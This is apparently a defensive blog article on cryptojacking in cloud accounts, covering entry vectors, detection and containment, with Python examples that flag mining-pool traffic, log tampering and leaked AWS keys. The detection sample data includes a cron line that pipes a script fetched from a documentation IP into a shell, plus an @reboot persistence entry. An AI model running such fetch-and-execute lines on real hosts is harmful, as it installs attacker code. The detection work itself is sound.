Cryptojacking in Cloud Environments

  • AUGUST 13TH, 2025
  • 2 min read

Introduction

Cryptojacking is the unauthorised use of your cloud compute to mine cryptocurrency. Adversaries gain access to cloud compute (VMs, containers, serverless functions, GPUs) through leaked keys, exposed services, or malicious images, then rapidly spin up instances across regions, tamper with logs to evade detection, and plant persistence (cron jobs, systemd units, startup hooks). The result is unpredictable cost and degraded performance, and, because the attacker could create resources and disable logging, evidence of broader control over the account.

Common Entry Vectors

  • Leaked/Hardcoded Credentials: Keys committed to source, printed in CI/CD logs, or pushed to public repos.

  • Exposed Services: Docker or Kubernetes APIs reachable from the internet without authentication, SSH/RDP open to the world, and IMDSv1 left enabled so that an SSRF bug in a web app can read the instance role's credentials.

  • Unpatched Apps & Images: Exploitation of known CVEs in internet-facing applications; base images that ship with a miner or a backdoor.

  • Over-Permissive IAM: Broad roles that allow unrestricted instance or pod creation in any region, and that let the same principal disable logging.

How to Identify

  • Metrics: Sustained high CPU/GPU utilisation on hosts with no matching workload; sudden Auto Scaling group scale-outs; abnormal Spot Instance usage.

  • Network: Outbound connections to mining pools, typically on stratum ports; DNS queries for known pool domains.

  • Host/Container: Unknown binaries, cron jobs, systemd timers or units, unexpected containers or pods.

  • Cloud Logs/Findings: Provisioning in regions you never use; logging or EDR disabled; crypto-mining alerts from cloud security tools.
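As an added example (not code from the CIL advisory), the identification signals above turned into checks that run over constructed sample logs: DNS queries to pool domains, outbound flows to stratum ports, CloudTrail events that disable logging or launch compute in an unexpected region, and crontab entries with persistence patterns. The indicator lists, VPC ranges, expected regions and log line formats are assumptions; in practice you would feed it your resolver logs, VPC flow logs, a CloudTrail export and per-host crontabs.

```python
import ipaddress
import re

# Indicator lists are assumptions for this example, not a vetted threat feed:
# a few well-known Monero pool domains and ports stratum miners dial out to.
POOL_DOMAINS = ("xmr.nanopool.org", "supportxmr.com", "minexmr.com")
STRATUM_PORTS = {3333, 4444, 5555, 7777, 14444}
# Assumed VPC ranges: traffic to these is internal and is not flagged.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
# Regions this (constructed) account is expected to deploy into.
EXPECTED_REGIONS = {"eu-west-1", "eu-west-2"}
# CloudTrail event names that reduce visibility or stand up compute.
LOG_TAMPER_EVENTS = {"StopLogging", "DeleteTrail", "UpdateTrail", "PutEventSelectors"}
COMPUTE_EVENTS = {"RunInstances", "RequestSpotInstances", "CreateAutoScalingGroup"}

# Assumed log line shapes: "<ts> <client> query <qname>" and "<ts> <src> -> <dst>:<port>".
DNS_LINE = re.compile(r"^(?P<ts>\S+) (?P<client>\S+) query (?P<qname>\S+)$")
CONN_LINE = re.compile(r"^(?P<ts>\S+) (?P<src>\S+) -> (?P<dst>\S+):(?P<port>\d+)$")
# Cron entries that download-and-pipe into a shell, run at boot, or live in tmpfs.
SUSPICIOUS_CRON = re.compile(r"(curl|wget)\b.*\|\s*(ba)?sh\b|@reboot|/tmp/\S+|/dev/shm/\S+")


def _is_pool_domain(qname):
    """Exact or subdomain match only, so 'nanopool.org.example.com' is not a hit."""
    qname = qname.rstrip(".").lower()
    return any(qname == d or qname.endswith("." + d) for d in POOL_DOMAINS)


def flag_dns(lines):
    """(client, qname) for every query that resolves a known mining-pool domain."""
    hits = []
    for line in lines:
        m = DNS_LINE.match(line.strip())
        if m and _is_pool_domain(m["qname"]):
            hits.append((m["client"], m["qname"].rstrip(".").lower()))
    return hits


def flag_connections(lines):
    """(src, dst, port) for flows leaving the VPC ranges on a stratum port."""
    hits = []
    for line in lines:
        m = CONN_LINE.match(line.strip())
        if not m:
            continue
        port = int(m["port"])
        try:
            dst = ipaddress.ip_address(m["dst"])
            internal = any(dst in net for net in INTERNAL_NETS)
        except ValueError:          # a hostname rather than an IP: treat as external
            internal = False
        if port in STRATUM_PORTS and not internal:
            hits.append((m["src"], m["dst"], port))
    return hits


def flag_cloudtrail(events):
    """(eventName, region, principal) for log tampering or compute outside expected regions."""
    hits = []
    for ev in events:
        name, region = ev.get("eventName"), ev.get("awsRegion")
        principal = ev.get("userIdentity", {}).get("arn", "unknown")
        if name in LOG_TAMPER_EVENTS or (name in COMPUTE_EVENTS and region not in EXPECTED_REGIONS):
            hits.append((name, region, principal))
    return hits


def flag_cron(lines):
    """Non-comment crontab lines matching the persistence patterns above."""
    return [s for s in (l.strip() for l in lines)
            if s and not s.startswith("#") and SUSPICIOUS_CRON.search(s)]


# Constructed sample inputs (documentation IPs and the AWS example account ID).
DNS_LOG = [
    "2025-08-13T09:01:02Z 10.0.1.15 query gulf.xmr.nanopool.org.",
    "2025-08-13T09:01:05Z 10.0.1.15 query repo.example.internal.",
    "2025-08-13T09:02:10Z 10.0.2.7 query pool.supportxmr.com.",
]
CONN_LOG = [
    "2025-08-13T09:01:03Z 10.0.1.15 -> 203.0.113.9:14444",
    "2025-08-13T09:01:04Z 10.0.1.15 -> 10.0.0.5:4444",       # internal service, not flagged
    "2025-08-13T09:03:00Z 10.0.2.7 -> 198.51.100.20:443",
]
CLOUDTRAIL = [
    {"eventName": "RunInstances", "awsRegion": "ap-southeast-1",
     "userIdentity": {"arn": "arn:aws:iam::123456789012:user/ci-deploy"}},
    {"eventName": "RunInstances", "awsRegion": "eu-west-1",
     "userIdentity": {"arn": "arn:aws:iam::123456789012:role/app"}},
    {"eventName": "StopLogging", "awsRegion": "eu-west-1",
     "userIdentity": {"arn": "arn:aws:iam::123456789012:user/ci-deploy"}},
]
CRONTAB = [
    "# m h dom mon dow command",
    "0 2 * * * /usr/local/bin/backup.sh",
    "@reboot /dev/shm/.x/run >/dev/null 2>&1",
    "*/10 * * * * curl -s http://203.0.113.9/i.sh | sh",
]


def triage():
    """Run every check over the constructed samples; an empty list means clean."""
    return {"dns": flag_dns(DNS_LOG), "connections": flag_connections(CONN_LOG),
            "cloudtrail": flag_cloudtrail(CLOUDTRAIL), "cron": flag_cron(CRONTAB)}


if __name__ == "__main__":
    for source, findings in triage().items():
        for finding in findings:
            print(f"[{source}] {finding}")
```

Note that the same principal (ci-deploy) shows up both launching compute in an unused region and calling StopLogging; correlating hits by principal is what turns four separate alerts into one incident.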

Immediate Response (Contain & Eradicate)

  • Isolate & Snapshot: Quarantine instances/pods, capture images for forensics.

  • Block Egress: Temporarily block pool domains/IPs, restrict internet egress.

  • Rotate Secrets: Revoke access keys, tokens, kubeconfigs; invalidate session tokens.

  • Remove Persistence: Kill miner processes, remove cron entries and systemd units and timers; rebuild the host from a trusted image rather than cleaning it in place.

  • Patch & Review: Fix the exploited service; review cloud activity for the same principal (new keys, roles, instances in other regions) and check for lateral movement.

  • Secrets Hygiene: Use short-lived creds, IAM roles/managed identities, secret managers; eliminate hardcoded keys.
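The Leaked/Hardcoded Credentials vector and the Secrets Hygiene step above both come down to keeping credential-shaped strings out of source and CI logs. As an added example (not code from the CIL advisory), a small Python scanner for a few credential formats with a documented structure, usable as a pre-commit or CI check, plus a scrub() for masking values before a log line reaches a sink. The pattern set, file names and sample contents are constructed; the AWS key pair used in the sample is the placeholder pair from AWS's own documentation, not a real credential.

```python
import re
import sys

# Credential formats with a stable, documented structure. The set is an assumption
# for this example; extend it with the providers your stack actually uses.
PATTERNS = {
    # AWS access key IDs: 20 chars, AKIA for long-term user keys, ASIA for temporary STS keys.
    "aws_access_key_id": re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b"),
    # The 40-char secret, but only next to its label: that keeps every SHA-1 hex
    # digest and random base64 blob in the tree from becoming a false positive.
    "aws_secret_access_key": re.compile(
        r"(?i)aws[_-]?secret[_-]?access[_-]?key\W{0,5}([A-Za-z0-9/+=]{40})(?![A-Za-z0-9/+=])"),
    "private_key": re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH |DSA )?PRIVATE KEY-----"),
}


def redact(value):
    """Keep enough of the value to tell which key leaked without reprinting it."""
    if len(value) <= 8:
        return "*" * len(value)
    return value[:4] + "*" * (len(value) - 8) + value[-4:]


def scan_text(text, source="<stdin>"):
    """Return (source, line_no, kind, redacted) for each credential-shaped token."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for kind, pattern in PATTERNS.items():
            for m in pattern.finditer(line):
                if kind == "private_key":
                    findings.append((source, line_no, kind, m.group(0)))
                else:
                    value = m.group(1) if m.lastindex else m.group(0)
                    findings.append((source, line_no, kind, redact(value)))
    return findings


def scrub(text):
    """Replace every credential value with its redacted form (for CI log sinks)."""
    out = []
    for line in text.splitlines():
        for kind, pattern in PATTERNS.items():
            if kind == "private_key":
                continue
            for m in reversed(list(pattern.finditer(line))):   # right-to-left keeps offsets valid
                start, end = m.span(1) if m.lastindex else m.span(0)
                line = line[:start] + redact(line[start:end]) + line[end:]
        out.append(line)
    return "\n".join(out)


def scan_files(paths):
    """Scan files on disk; returns the findings so a CI job can fail when non-empty."""
    findings = []
    for path in paths:
        with open(path, encoding="utf-8", errors="replace") as fh:
            findings.extend(scan_text(fh.read(), source=path))
    return findings


# Constructed samples: a config file that should never be committed, and a CI
# log that echoes a secret through 'set -x'. The git SHA-1 must not be flagged.
SAMPLE_CONFIG = """\
# constructed sample, never commit a file like this
AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE
AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
DB_HOST=db.internal
"""
SAMPLE_CI_LOG = """\
[12:00:01] + export AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
[12:00:02] git commit 2fd4e1c67a2d28fced849ee1bb76e7391b93eb12
[12:00:03] -----BEGIN RSA PRIVATE KEY-----
"""


if __name__ == "__main__":
    found = scan_files(sys.argv[1:]) if len(sys.argv) > 1 else scan_text(SAMPLE_CONFIG, "config.env")
    for source, line_no, kind, shown in found:
        print(f"{source}:{line_no}: {kind}: {shown}")
    sys.exit(1 if found else 0)
```

A non-zero exit from the gate is what blocks the merge; a finding that fires on a real key still means the key is already compromised from the moment it hit the log or the repo history, so the answer is rotation, not just deletion of the line.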

Conclusion

Treat cryptojacking as both cost fraud and a security breach: the miner is the symptom, the access that launched it is the problem. Pair strict identity controls with hardened compute, tight egress, continuous monitoring, and automated containment.
